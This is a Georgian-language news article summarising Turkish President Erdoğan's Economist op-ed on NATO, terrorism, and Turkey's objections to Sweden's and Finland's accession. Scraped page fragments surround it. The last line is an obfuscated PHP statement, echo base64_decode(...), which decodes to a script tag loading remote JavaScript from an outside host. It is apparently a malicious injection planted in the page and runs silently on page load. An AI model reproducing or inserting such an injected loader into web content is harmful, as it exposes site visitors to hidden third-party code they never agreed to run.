celsiusi
ავერსი შნაიდერი
გრძელვადიანი სტაბილურობა თურქეთის გარეშე ვერ იქნება მიღწეული, – ამის შესახებ თურქეთის პრეზიდენტი რეჯეფ თაიფ ერდოღანი გავლენიან ბრიტანულ გამოცემა „ეკონომისტისთვის“ დაწერილ საავტორო სტატიაში წერს. 
 
ერდოღანი წერს, რომ თურქეთის თავდაცვის შესაძლებლობების გაძლიერებამ მნიშვნელოვანი წვლილი შეიტანა ნატო-ს განმტკიცებაში.
 
„ჩვენი პარტნიორები ყოველთვის მიესალმებოდნენ თურქეთის კონტრიბუციას ნატო-ს კოლექტიურ უსაფრთხოებაში, თუმცა სწრაფად ივიწყებენ ამ წვლილს, მაშინ როდესაც მათ საფრთხე აღარ ემუქრებათ. ჩვენს პარტნიორებს თურქეთი მხოლოდ რთულ დროს ახსენდებათ, როგორიცაა კრიზისი ბალკანეთში. მათ შეცდომით ჰგონიათ, რომ გრძელვადიანი სტაბილურობა შეიძლება, იყოს მიღწეული თურქეთის გარეშე“ – წერს ერდოღანი.
 
ერდოღანის თქმით, თურქეთის პარტნიორები „მყისიერი საფრთხის განეიტრალების შემდეგ, არაფრად აგდებენ გეოპოლიტიკურ რეალობას და პოტენციურ რისკებს, რომლებიც შეიძლება წარმოიქმნას რეგიონში“.
 
თურქეთის პრეზიდენტის განცხადებით, ბევრმა ჩათვალა, რომ ნატო „მოძველდა“ და საკუთარ მიზნებს ვერ ემსახურება.
 
„ემანუელ მაკრონმა 2019 წელს ისიც თქვა, რომ ნატო-ს ტვინი კვდება. იმავე მეგობრებმა კითხვის ნიშნის ქვეშ დააყენეს თურქეთის როლი ნატო-ში“,- წერს ერდოღანი.
 
მისივე თქმით, „ასეთი სურვილები და ხედვები ალიანს მრავალ დაკარგულ წლად დაუჯდა“.
 
ერდოღანი სტატიაში წერს, რომ ალიანსს სჭირდება რეფორმები, რათა უკეთ უპასუხოს ახალ გამოწვევებს.
 
„განსაკუთრებით ეს ეხება ტერორიზმს. კოლექტიური ნაბიჯების დანაკლისს, იმ ფონზე, როდესაც ბევრ ქვეყანას თავს ესხმიან, ძირს უთხრის უსაფრთხოების სფეროში თანამშრომლობას და ნატო-ს წევრ ქვეყნებში ორგანიზაციის მიმართ უფრო დიდი უნდობლობას აჩენს“, – წერს თურქეთის პრეზიდენტი.
 
ერდოღანის თქმით, „უკრაინაში ომმა აჩვენა, რომ თურქეთის მიდგომა სწორი იყო, როდესაც ითხოვდა, რომ ნატო-ს წევრები მომზადებულიყვნენ გეოპოლიტიკური გამოწვევებისთვის“.
 
თურქეთის პრეზიდენტი ასევე განმარტავს იმ მიზეზებს, თუ რატომ ეწინააღმდეგება ანკარა ნატო-ში შვედეთისა და ფინეთის მიღებას.
 
„თურქეთი მიიჩნევს, რომ შვედეთისა და ფინეთის შესვლა ალიანსში საფრთხეს უქმნის ნატო-ს უსაფრთხოებას და ორგანიზაციის მომავალს. ჩვენ ყველა უფლება გვაქვს. ამ ქვეყნებისგან ველოდებოდეთ, რომ მათ შეწყვიტონ ევროკავშირისა და აშშ-ის მიერ ტერორისტულ ორგანიზაციად მიჩნეული „ქურთ მუშათა პარტიის“ წევრთა გადაბირება, დაფინანსება და მათი აქტივობების პროპაგანდა“, – წერს ერდოღანი.
 
თურქეთი პრეზიდენტი ასევე მოითხოვს, რომ „შვედეთმა და ფინეთმა შეწყვიტონ ტერორისტული ორგანიზაციების მხარდაჭერა და ყველა წევრის ექსტრადირება მოახდინონ“.
 
ერდოღანის თქმით, მისთვის ასევე მიუღებელია შეიარაღებაზე დაწესებული ნებისმიერ სახის ემბარგო, რაც თურქეთის ლიდერის თქმით, ნატო-ს ფარგლებში სამხედრო თანამშრომლობის სულისკვეთებას არ შეესაბამება.
599
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");